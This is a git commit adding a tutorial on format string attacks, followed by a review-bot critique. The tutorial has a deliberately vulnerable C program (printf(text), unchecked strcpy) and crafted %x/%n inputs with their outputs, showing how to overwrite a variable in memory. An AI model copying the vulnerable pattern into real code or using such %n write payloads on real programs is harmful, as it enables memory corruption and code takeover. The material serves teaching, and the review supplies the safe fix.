| field | value | date |
|---|---|---|
| author | FreeArtMan <dos21h@gmail.com> | 2021-05-27 21:10:45 +0100 |
| committer | FreeArtMan <dos21h@gmail.com> | 2021-05-27 21:10:45 +0100 |
| commit | efa24b220d9633d5d7bfef632b33df180dcb0e74 (patch) | |
| tree | ac8502acf0116fbbb42a09c6956be70b9a3fc49f /md/writeup/linux_format_string_attack.md | |
| parent | e63ed8a651e5246f8698a9c1c3e540029710d0e9 (diff) | |
| download | md-content-efa24b220d9633d5d7bfef632b33df180dcb0e74.tar.gz md-content-efa24b220d9633d5d7bfef632b33df180dcb0e74.zip | |
Update 10 html to md articles
Diffstat (limited to 'md/writeup/linux_format_string_attack.md')

| mode | file | lines |
|---|---|---|
| -rw-r--r-- | md/writeup/linux_format_string_attack.md | 122 |

1 files changed, 122 insertions, 0 deletions
diff --git a/md/writeup/linux_format_string_attack.md b/md/writeup/linux_format_string_attack.md new file mode 100644 index 0000000..cbffe87 --- /dev/null +++ b/md/writeup/linux_format_string_attack.md 
@@ -0,0 +1,122 @@ +title:X11 Linux Format String Attack +keywords:linux,c,formatting,printf + +# Linux Format String Attack +Format string attack is attack for C formated strings. Format string +function is prinrf() there are other functions that +support format string.C code for bad used printf(): + +``` +int main( int argc, char **argv ) +{ + static int i = 0; + char text[1000]; + strcpy(text, argv[1]); + printf("%.8x\n",&i); + printf("No way it never will works because value of i=%d\n",i); + printf( text ); + printf("\nValue of i=%d\n",i); + return 0; +} + +``` +First output is address of static iThan we output values of +i and call printf() with first argument fo programm.and +then watching value if i + +Run: + +``` +./e1 'Halolo' +``` + +Output: +``` +08049674 +No way it never will works because value of i=0 +Halolo +Value of i=0 +``` + +Run: +``` +./e1 'Halolo%s' +``` + +Output: +``` +08049674 +No way it never will works because value of i=0Halolo(null) +Value of i=0 +``` + +Run: +``` +./e1 $'\x74\x96\x04\x08_%x' +``` + +Output: +``` +08049674 +No way it never will works because value of i=0 +t?_0 +Value of i=0 +``` + +Read about %n in format string: + +Run: +``` +./e1 $'\x74\x96\x04\x08_%x_%n' +``` + +Output: + +``` +08049674 +No way it never will works because value of i=0 +Segmentation fault +``` + +Run: + +``` +./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%x_%n' +``` + +Output: +``` +08049674 +No way it never will works because value of i=0 +t?_0_8_40_4_4_ +Value of i=16 +``` + +Run: + +``` +./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%.1201x_%n' +``` + +Output: +``` +08049674 +No way it never will works because value of i=0 +t?_0_8_40_4_000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 
+000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000004_ +Value of i=1216 +``` + +Now you can input almost any value to i |
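Review bot: the sample program in this hunk is missing its safe counterpart, so the write-up shows the bug without ever showing the fix. `printf( text );` hands attacker-controlled `argv[1]` to printf as the format argument; the article should state the corrected call explicitly (`printf("%s", text);` or `fputs(text, stdout);`) and note that gcc reports this pattern with `-Wformat-security` ("format not a string literal and no format arguments"). Smaller points in the same listing: it lacks `#include <stdio.h>` and `#include <string.h>`; `strcpy(text, argv[1]);` copies into a fixed 1000-byte buffer with no length check, which is a second, unrelated bug and should at least be called out as such; and `printf("%.8x\n",&i);` passes a pointer to `%x`, where `%p` is the correct conversion. The line `Read about %n in format string:` introduces nothing; it should either explain that `%n` stores the number of bytes written so far into the pointed-to `int` (which is exactly why `i` becomes 16 after `t?_0_8_40_4_4_`, 4 address bytes plus 12 characters, and 1216 once `%.1201x` pads the fifth value) or be removed. The `?` in the output lines is the terminal's rendering of the non-printable `\x96` address byte and deserves a sentence. Finally, the title `X11 Linux Format String Attack` carries a stray `X11`, and `prinrf()`, `formated`, `fo programm` and `static iThan` are typos.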